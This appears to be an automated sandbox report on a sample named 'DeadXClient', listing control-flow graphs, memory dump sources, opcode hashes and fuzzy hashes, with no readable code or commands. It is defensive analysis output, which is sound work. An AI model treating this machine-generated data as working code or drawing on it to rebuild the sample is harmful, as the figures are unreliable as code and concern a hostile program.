control_flow_graph 272 7ffd344f7ef2-7ffd344f7eff 273 7ffd344f7f0a-7ffd344f7fd7 272->273 274 7ffd344f7f01-7ffd344f7f09 272->274 278 7ffd344f7fd9-7ffd344f7fe2 273->278 279 7ffd344f8043 273->279 274->273 278->279 281 7ffd344f7fe4-7ffd344f7ff0 278->281 280 7ffd344f8045-7ffd344f806a 279->280 288 7ffd344f806c-7ffd344f8075 280->288 289 7ffd344f80d6 280->289 282 7ffd344f8029-7ffd344f8041 281->282 283 7ffd344f7ff2-7ffd344f8004 281->283 282->280 285 7ffd344f8008-7ffd344f801b 283->285 286 7ffd344f8006 283->286 285->285 287 7ffd344f801d-7ffd344f8025 285->287 286->285 287->282 288->289 290 7ffd344f8077-7ffd344f8083 288->290 291 7ffd344f80d8-7ffd344f80fd 289->291 292 7ffd344f80bc-7ffd344f80d4 290->292 293 7ffd344f8085-7ffd344f8097 290->293 297 7ffd344f816b 291->297 298 7ffd344f80ff-7ffd344f8109 291->298 292->291 295 7ffd344f809b-7ffd344f80ae 293->295 296 7ffd344f8099 293->296 295->295 299 7ffd344f80b0-7ffd344f80b8 295->299 296->295 301 7ffd344f816d-7ffd344f819b 297->301 298->297 300 7ffd344f810b-7ffd344f8118 298->300 299->292 302 7ffd344f811a-7ffd344f812c 300->302 303 7ffd344f8151-7ffd344f8169 300->303 308 7ffd344f820b 301->308 309 7ffd344f819d-7ffd344f81a8 301->309 304 7ffd344f8130-7ffd344f8143 302->304 305 7ffd344f812e 302->305 303->301 304->304 307 7ffd344f8145-7ffd344f814d 304->307 305->304 307->303 310 7ffd344f820d-7ffd344f82e5 308->310 309->308 311 7ffd344f81aa-7ffd344f81b8 309->311 321 7ffd344f82eb-7ffd344f82fa 310->321 312 7ffd344f81ba-7ffd344f81cc 311->312 313 7ffd344f81f1-7ffd344f8209 311->313 314 7ffd344f81d0-7ffd344f81e3 312->314 315 7ffd344f81ce 312->315 313->310 314->314 317 7ffd344f81e5-7ffd344f81ed 314->317 315->314 317->313 322 7ffd344f82fc 321->322 323 7ffd344f8302-7ffd344f8364 call 7ffd344f8380 321->323 322->323 330 7ffd344f836b-7ffd344f837f 323->330 331 7ffd344f8366 323->331 331->330
Memory Dump Source
• Source File: 00000006.00000002.3508476855.00007FFD344F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD344F0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_7ffd344f0000_DeadXClient.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 2e2a90e60151a2f47ee5ff48b2921496c351d4d3f51eb3d262a5b448fa9e92f9
• Instruction ID: 78baec6bacd12f5cc1316852df3bae74ad943978f6a109fd32e8f27d7c9aca0d
• Opcode Fuzzy Hash: 2e2a90e60151a2f47ee5ff48b2921496c351d4d3f51eb3d262a5b448fa9e92f9
• Instruction Fuzzy Hash: C1E1B231A08A4E8FEBA8DF28C8A57E977D1FF55311F05423AD84DC7295CF78A8508B81
Memory Dump Source
• Source File: 00000006.00000002.3508476855.00007FFD344F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD344F0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_7ffd344f0000_DeadXClient.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: bb18b126b664e2c868a77ba717f12a0c79d0597705395d2d88dab019b2f6c5ce
• Instruction ID: de658ae4c202cb4274fc34db6502c945aefaa61a663cd75d9491ca8f3fa0cb6a
• Opcode Fuzzy Hash: bb18b126b664e2c868a77ba717f12a0c79d0597705395d2d88dab019b2f6c5ce
• Instruction Fuzzy Hash: 2251002170D6C90FE796A76848B5275BFD1EF97215B0800FBE08DC31A7DD585C06C342

Control-flow Graph

[Control-flow graph of the function at 7ffd344f87d1 (nodes marked executed / not executed); the raw node and edge list of the rendered graph is omitted]
Strings
Memory Dump Source
• Source File: 00000006.00000002.3508476855.00007FFD344F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD344F0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_7ffd344f0000_DeadXClient.jbxd
Similarity
• API ID:
• String ID: d
• API String ID: 0-2564639436
• Opcode ID: 440bba8a040fbea5834ff4ced82e23e4772573a70c4bcb8047a413d0e20fcef9
• Instruction ID: 784cbcd160d1aa8b02afa8adefb30c24a0e677bf3b815b199d86556ed1ecacb8
• Opcode Fuzzy Hash: 440bba8a040fbea5834ff4ced82e23e4772573a70c4bcb8047a413d0e20fcef9
• Instruction Fuzzy Hash: 19112932E0C6594FEB54AB6488692FD7BA0EF46300F42017BDA09E7182DB6D9C509381

Control-flow Graph

[Control-flow graph of the function at 1c59b980 (nodes marked executed / not executed); the raw node and edge list of the rendered graph is omitted]
APIs
• HeapAlloc.KERNEL32(?,?,00000000,1C59B521,?,?,?,1C59B969,?,?,?,?,1C59BA1D), ref: 1C59B9D5
Memory Dump Source
• Source File: 00000006.00000002.3503593133.000000001C591000.00000020.00001000.00020000.00000000.sdmp, Offset: 1C590000, based on PE: true
• Associated: 00000006.00000002.3503421421.000000001C590000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000006.00000002.3503957974.000000001C5A3000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000006.00000002.3504194441.000000001C5AD000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000006.00000002.3504350241.000000001C5AF000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000006.00000002.3504590015.000000001C5B5000.00000002.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_1c590000_DeadXClient.jbxd
Similarity
• API ID: AllocHeap
• String ID:
• API String ID: 4292702814-0
• Opcode ID: 49727549add3322cc68842f1d13a6e156a3df9b4bb079db6988531afba47aa00
• Instruction ID: 5f2eaf880c1ab7fa0b25b0f106fc4b40fd72c8f0deb9fbf8ae2374edf57f28c8
• Opcode Fuzzy Hash: 49727549add3322cc68842f1d13a6e156a3df9b4bb079db6988531afba47aa00
• Instruction Fuzzy Hash: 91F02078323B05C1FF295BA398913D22395AF88F80FEC18B04D0A87B80EE6DD084C230

Control-flow Graph

[Control-flow graph of the function at 7ffd344f24d9 (nodes marked executed / not executed); the raw node and edge list of the rendered graph is omitted]
Strings
Memory Dump Source
• Source File: 00000006.00000002.3508476855.00007FFD344F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD344F0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_7ffd344f0000_DeadXClient.jbxd
Similarity
• API ID:
• String ID: SAM_^
• API String ID: 0-3658645246
• Opcode ID: 97af97e8eae316dbb4ba27a13f9bed9550cbdc8f56a32b207a6057a3c0a5fb11
• Instruction ID: 91cf803903c4009e65c3845a871af2e80d0385a87653759e78b84c3b913865d8
• Opcode Fuzzy Hash: 97af97e8eae316dbb4ba27a13f9bed9550cbdc8f56a32b207a6057a3c0a5fb11
• Instruction Fuzzy Hash: E6F04F22F0C14247F364E77884B26BE2692BFC6354F961578E11EC62CADEBDF8016242

Control-flow Graph

Memory Dump Source
• Source File: 00000006.00000002.3508476855.00007FFD344F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD344F0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_7ffd344f0000_DeadXClient.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: e29affb2b93174b128f1430832722d093da796cf88810c74e7845b685c58f73a
• Instruction ID: 921ce60dbe1cdc7c6e63da109a7170a55fed45571c2e1186522b2d3292ac15ca
• Opcode Fuzzy Hash: e29affb2b93174b128f1430832722d093da796cf88810c74e7845b685c58f73a
• Instruction Fuzzy Hash: D7813622B0CA494FE7A9E76C44A53B977D2EF9A350F54057AD04ED32D6ED6C6C028381

Control-flow Graph

[Control-flow graph of the function at 7ffd344f8dd5 (nodes marked executed / not executed); the raw node and edge list of the rendered graph is omitted]
Memory Dump Source
• Source File: 00000006.00000002.3508476855.00007FFD344F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD344F0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_7ffd344f0000_DeadXClient.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: fb4f1f1c685e72e4b04c7c35a35246e6940ae094a87e4e84be27e468f6841d24
• Instruction ID: c2de8034138c70a546a3dbe9d0af1cde3cb2f5590ba48d75c7ab2c10dd4e844a
• Opcode Fuzzy Hash: fb4f1f1c685e72e4b04c7c35a35246e6940ae094a87e4e84be27e468f6841d24
• Instruction Fuzzy Hash: 21D12732F1C50A4FFB98EB6888A66B977E1FF46300F0501B9D00DC71D6DE6CA8529781

Control-flow Graph

[Control-flow graph of the function at 7ffd344f7b06 (nodes marked executed / not executed); the raw node and edge list of the rendered graph is omitted]
Memory Dump Source
• Source File: 00000006.00000002.3508476855.00007FFD344F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD344F0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_7ffd344f0000_DeadXClient.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 3251331f79c22aee2d965217daa9a0623a23de95b79a39244727f65726beb032
• Instruction ID: 250ebb25b8740f7b82465c1ca5f8d105f1a2317ee404f26c176b50cadc02bea1
• Opcode Fuzzy Hash: 3251331f79c22aee2d965217daa9a0623a23de95b79a39244727f65726beb032
• Instruction Fuzzy Hash: ABB1C731608A8D4FEBA8DF28D8957E93BE1FF55310F04427EE84DC7295DA789845CB82

Control-flow Graph

Memory Dump Source
• Source File: 00000006.00000002.3508476855.00007FFD344F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD344F0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_7ffd344f0000_DeadXClient.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: e210797258dc96cf8387e9ff56f3423e8ae1d50c4b5323f6372715824ca780a5
• Instruction ID: 655361f6d3bbbe5b4fedfd76fa7060ad8209bbaf03abf6549b5eb8d05535e4a0
• Opcode Fuzzy Hash: e210797258dc96cf8387e9ff56f3423e8ae1d50c4b5323f6372715824ca780a5
• Instruction Fuzzy Hash: 8591D224B989459BE791F7AC987677AB3E6EF99300F50017AE00DC32D7DE6CA8418353

Control-flow Graph

Memory Dump Source
• Source File: 00000006.00000002.3508476855.00007FFD344F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD344F0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_7ffd344f0000_DeadXClient.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 332facc2205c494251c00169e5bd0ce4ccfc5130cb75f341f7f323a7750d0361
• Instruction ID: b1b969d2e8e95235c36f89c0fa6fa27aa4fb474b696d24207df183d88424e017
• Opcode Fuzzy Hash: 332facc2205c494251c00169e5bd0ce4ccfc5130cb75f341f7f323a7750d0361
• Instruction Fuzzy Hash: C1817F24BA89099BF794F7ACD46677AB3E6EFE8300F500575E00DC32D6DE68AC418752

                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000006.00000002.3508476855.00007FFD344F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD344F0000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_7ffd344f0000_DeadXClient.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: 4f4dffe76e6a08b823c79ccbf95f9b52fd8a203be36cffb68a7a47ca3afd4b0d
                                                                                                                                                                                  • Instruction ID: 0aedf2ce2123625e660c461e56ecb09b33b6a70b953cf03930773bc8e6792df7
                                                                                                                                                                                  • Opcode Fuzzy Hash: 4f4dffe76e6a08b823c79ccbf95f9b52fd8a203be36cffb68a7a47ca3afd4b0d
                                                                                                                                                                                  • Instruction Fuzzy Hash: 95710732B0C9494FDB98EB68D4A66F977E1EF5A311F05017AE00DD31D6CE6DA841CB41

                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000006.00000002.3508476855.00007FFD344F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD344F0000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_7ffd344f0000_DeadXClient.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: 7e16a4beb091d53f302d72d8c7c61dcf99fec3d653f661249ac08456b98ca684
                                                                                                                                                                                  • Instruction ID: 70a224823ee75cd8d8aec2ac7a1beaa38ca1fb097d5553b5cee157989d723ded
                                                                                                                                                                                  • Opcode Fuzzy Hash: 7e16a4beb091d53f302d72d8c7c61dcf99fec3d653f661249ac08456b98ca684
                                                                                                                                                                                  • Instruction Fuzzy Hash: 4C611922B1994E0FF7A8E66C98A62FD77D2EFCA311F45017AD44DD3296DD6C6C428380

                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000006.00000002.3508476855.00007FFD344F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD344F0000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_7ffd344f0000_DeadXClient.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: 42492f82b4600123582476b5eb2e0b1a366518d2c6cdd72b4a1ab7ea679e0592
                                                                                                                                                                                  • Instruction ID: 77741e05d844afdd80acfce5ec443f10e7d09432ff05f3d53cf0bd4888b3234a
                                                                                                                                                                                  • Opcode Fuzzy Hash: 42492f82b4600123582476b5eb2e0b1a366518d2c6cdd72b4a1ab7ea679e0592
                                                                                                                                                                                  • Instruction Fuzzy Hash: 5661F862F189094BE7A8E76C80B93B977D2FF99350F940579E04ED33D6ED6C68028781

                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000006.00000002.3508476855.00007FFD344F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD344F0000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_7ffd344f0000_DeadXClient.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: bada4c7e5599b5406ea78ea2fb4784ac99d98cd9cd11419b867dcc8db0edf922
                                                                                                                                                                                  • Instruction ID: d9bd75546a4c267f675c45ad8096c8ea04987540f04827ddf5bf95dfdab992c8
                                                                                                                                                                                  • Opcode Fuzzy Hash: bada4c7e5599b5406ea78ea2fb4784ac99d98cd9cd11419b867dcc8db0edf922
                                                                                                                                                                                  • Instruction Fuzzy Hash: 9661F762B1DE4A0BF7A8EB6C44BA379B7C2FF99250F45067AD04EC3296DD6CAC014741
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000006.00000002.3508476855.00007FFD344F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD344F0000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_7ffd344f0000_DeadXClient.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: 49ecee83fd196064a8285702b8e9dfabab3a989b5bec3f6e775a4a3e96a303f4
                                                                                                                                                                                  • Instruction ID: 6a3a668a4b2a523134bc7596fa02e91578168488e33e765e8945cd8f87003dc9
                                                                                                                                                                                  • Opcode Fuzzy Hash: 49ecee83fd196064a8285702b8e9dfabab3a989b5bec3f6e775a4a3e96a303f4
                                                                                                                                                                                  • Instruction Fuzzy Hash: E361D632B189194FEB98EB68D4A56BD77E2FF99310F110579E00ED3296CE79AC418B40
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000006.00000002.3508476855.00007FFD344F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD344F0000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_7ffd344f0000_DeadXClient.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: f17c99baa51ca2fb5f59afcf2ea8042d9f6cb1e7564b0b4eea59a18c28d3aa09
                                                                                                                                                                                  • Instruction ID: 8700d1e812b2dd5887d1a0038eb36b73c888c1e898671f0c10e875035b5919bb
                                                                                                                                                                                  • Opcode Fuzzy Hash: f17c99baa51ca2fb5f59afcf2ea8042d9f6cb1e7564b0b4eea59a18c28d3aa09
                                                                                                                                                                                  • Instruction Fuzzy Hash: A7519331A08A1C4FDB68EF58D8957E9BBF1FF99310F10416AD44DD3252CB74A9428B81
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000006.00000002.3508476855.00007FFD344F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD344F0000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_7ffd344f0000_DeadXClient.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: 00abefb62d80a2ddb05293db71a3c65a865fd15bc4a354b53ac1b1ec87eb987e
                                                                                                                                                                                  • Instruction ID: 488044854dfdfeaefbe4e43b8bce89674e888c2f9405b1555f2a71edd756b6b9
                                                                                                                                                                                  • Opcode Fuzzy Hash: 00abefb62d80a2ddb05293db71a3c65a865fd15bc4a354b53ac1b1ec87eb987e
                                                                                                                                                                                  • Instruction Fuzzy Hash: 1D61B631F1850E8FEB94EB68D4A56BD77E2FF8A301F4101B9E50DC3296DE6CA8419B41
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000006.00000002.3508476855.00007FFD344F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD344F0000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_7ffd344f0000_DeadXClient.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: d15411373c50b43ae34c7f6410b1ac424d43b6781a8f2da13f732535348c850d
                                                                                                                                                                                  • Instruction ID: 23d98f4fa4ceb745ec2d954ba11e4989bdd5240d245824dbd980675dcc6bc317
                                                                                                                                                                                  • Opcode Fuzzy Hash: d15411373c50b43ae34c7f6410b1ac424d43b6781a8f2da13f732535348c850d
                                                                                                                                                                                  • Instruction Fuzzy Hash: AD511331A0CA498FE718DB68C8A57B87BE0FF56320F44417ED04DC3192DB6AA846CB91
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000006.00000002.3508476855.00007FFD344F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD344F0000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_7ffd344f0000_DeadXClient.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: 815079a0ff7cb2bec8bafa10b90314bc4c5f9ddba64d150a95eeef27e3355594
                                                                                                                                                                                  • Instruction ID: 622ac3ccddc319867c4eab1a0946a1be67bd71f26058cf74ffe31a66d647ba73
                                                                                                                                                                                  • Opcode Fuzzy Hash: 815079a0ff7cb2bec8bafa10b90314bc4c5f9ddba64d150a95eeef27e3355594
                                                                                                                                                                                  • Instruction Fuzzy Hash: DE517431908A1C8FDB68DB58D855BE9BBF1FF59310F0082AAD04DE3252DE74A9858F81
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000006.00000002.3508476855.00007FFD344F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD344F0000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_7ffd344f0000_DeadXClient.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
• Opcode ID: 13ff0e51e6a40442f73146cb6b9cd401b8b58cbec875842df134ea7dc4ec05a1
• Instruction ID: 1c9fc70d950af0ab9e4ebeb124b3e4e16a1dd04028e0b912d2c85f604e1c7b7d
• Opcode Fuzzy Hash: 13ff0e51e6a40442f73146cb6b9cd401b8b58cbec875842df134ea7dc4ec05a1
• Instruction Fuzzy Hash: C6513331A0C6C64FEB569B7848622A57FA0FF53320F1902FAC099C71D7DEADA842C751
Memory Dump Source
• Source File: 00000006.00000002.3508476855.00007FFD344F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD344F0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_7ffd344f0000_DeadXClient.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: fa162dbd11c13c46f4b76390d44e8163dfd460f91fb5a697326e883206c95c9d
• Instruction ID: 204b2976ca863b73b4ff5ee602c2477681a4ad2863c6a64d449a30cb72cfc44e
• Opcode Fuzzy Hash: fa162dbd11c13c46f4b76390d44e8163dfd460f91fb5a697326e883206c95c9d
• Instruction Fuzzy Hash: E751E631B1C54A8FEB95EB68D8A56B977E1FF4A301F0500BAE00DC3297DE6CA8419B41
Memory Dump Source
• Source File: 00000006.00000002.3508476855.00007FFD344F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD344F0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_7ffd344f0000_DeadXClient.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 36ffa565b7ab8c9d1c80f301b4f10b0bb4b0af2c0a35c2dc3c085b52bd11cb01
• Instruction ID: 925f024660bf6c13623b536435cf30884170797282b8a270a130c6c331dcc4c6
• Opcode Fuzzy Hash: 36ffa565b7ab8c9d1c80f301b4f10b0bb4b0af2c0a35c2dc3c085b52bd11cb01
• Instruction Fuzzy Hash: 6A51A074A48A5DCFEB58EB68D4A5BA97BE0FF26311F40017ED00AC3692DB759841CB41
Memory Dump Source
• Source File: 00000006.00000002.3508476855.00007FFD344F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD344F0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_7ffd344f0000_DeadXClient.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 2789779cc986a6b3f7c3f7309d224a24f329209c55792acb788a05b8dccfcf45
• Instruction ID: b582d9450b391b60da76fa582d1122d870cb909e043f9b8a1a53f31c1e8950a7
• Opcode Fuzzy Hash: 2789779cc986a6b3f7c3f7309d224a24f329209c55792acb788a05b8dccfcf45
• Instruction Fuzzy Hash: 64412821B1DA8A0FF7A9A6BC446A6793BD2EFC7311B0900FAD44DC3297DC5CAC429341
Memory Dump Source
• Source File: 00000006.00000002.3508476855.00007FFD344F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD344F0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_7ffd344f0000_DeadXClient.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: d4038b6b0546491ffde3bcc54100d602ee0e531b286941cf2d20bfbeb479e7d4
• Instruction ID: 808a597974acc0fd0685651c431ff433f83746392bfe0505dd8d2ec24e2b2e6c
• Opcode Fuzzy Hash: d4038b6b0546491ffde3bcc54100d602ee0e531b286941cf2d20bfbeb479e7d4
• Instruction Fuzzy Hash: A0415974A08A1D8FEB98EB68D4A5BB977E0FF66311F40017ED00AD3691DA76A8418B41
Memory Dump Source
• Source File: 00000006.00000002.3508476855.00007FFD344F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD344F0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_7ffd344f0000_DeadXClient.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 353e848c06e96a1eddff4276d80dbae2f0160822a9fb4427dcd2393a1333b143
• Instruction ID: 27c2d618a09edbac063ebdc3324f087aed215a6e0b847abdb3fa85c2e9493d51
• Opcode Fuzzy Hash: 353e848c06e96a1eddff4276d80dbae2f0160822a9fb4427dcd2393a1333b143
• Instruction Fuzzy Hash: EB41C232B09A4D8FEB94EB6894A96FD77E1FF59300B0501BAD40DD7292EF3C98418751
Memory Dump Source
• Source File: 00000006.00000002.3508476855.00007FFD344F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD344F0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_7ffd344f0000_DeadXClient.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: e114871f08c66388c3b9fec313d61cf0a3b8b8e03d958eb4017aa3ce345ea09c
• Instruction ID: ac578803b13655bb126d88fb0c34b62bf9280958748ecbf2891c7c59947631c1
• Opcode Fuzzy Hash: e114871f08c66388c3b9fec313d61cf0a3b8b8e03d958eb4017aa3ce345ea09c
• Instruction Fuzzy Hash: 0541C231F0894A8FEB98EB6880B56B977E1FF99310F15017DD01ED32C6DE6EA8419741
Memory Dump Source
• Source File: 00000006.00000002.3508476855.00007FFD344F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD344F0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_7ffd344f0000_DeadXClient.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 4b891957a411ccd5203f6a59c3e5ce65d1ee973f8361146b1ae09eacdf1b4aea
• Instruction ID: 82d501dcc7f769f7d4adb8f3d496ba60e9e65a6156b16858dfa460b446348875
• Opcode Fuzzy Hash: 4b891957a411ccd5203f6a59c3e5ce65d1ee973f8361146b1ae09eacdf1b4aea
• Instruction Fuzzy Hash: C231C721B1C9490FE7A8EB6C946A779B7C2EF99311F0505BEE04EC3297DDA9AC418341
Memory Dump Source
• Source File: 00000006.00000002.3508476855.00007FFD344F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD344F0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_7ffd344f0000_DeadXClient.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: baffaf4a4023f6f11cc49f203fd4b63a82f0498babeb8046a4798d5d3d44afc9
• Instruction ID: 27359ce8e72043c12034fa3911d818e610fcf61aee47d2fd690a135f0aadfd9e
• Opcode Fuzzy Hash: baffaf4a4023f6f11cc49f203fd4b63a82f0498babeb8046a4798d5d3d44afc9
• Instruction Fuzzy Hash: FE31A312B1894A5FEB54BBBC58693BD77D6EFD9311F0502BAE40CC3297DE5868018352
Memory Dump Source
• Source File: 00000006.00000002.3508476855.00007FFD344F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD344F0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_7ffd344f0000_DeadXClient.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 546aa8a0fc084bddcbab720a772ef353b848d6721d6e6d7c443a66c6d1977c22
• Instruction ID: f9cc348f3f89ebe525bb4669c415176688339ac943cc6c455ef7f7db43a4496d
• Opcode Fuzzy Hash: 546aa8a0fc084bddcbab720a772ef353b848d6721d6e6d7c443a66c6d1977c22
• Instruction Fuzzy Hash: 3B31A412F2890A5BFB94BBBC58693BD67D6EFD9702F44027AE40DC32D6DD5868014392
Memory Dump Source
• Source File: 00000006.00000002.3508476855.00007FFD344F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD344F0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_7ffd344f0000_DeadXClient.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 31a46d1f4e190ddc8ca5d0284dd88063abb5e25f4003cb17a83802c2e0fad87d
• Instruction ID: 998fd39e98ca85b16c54076737b00c941145685fe21740ce0beb6d0b4ba5ddc9
• Opcode Fuzzy Hash: 31a46d1f4e190ddc8ca5d0284dd88063abb5e25f4003cb17a83802c2e0fad87d
• Instruction Fuzzy Hash: A8319E71B58A4A9FEB54FBA8C8A57F97BB1FF98300F900479D009D3386DE7868018750
Memory Dump Source
• Source File: 00000006.00000002.3508476855.00007FFD344F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD344F0000, based on PE: false
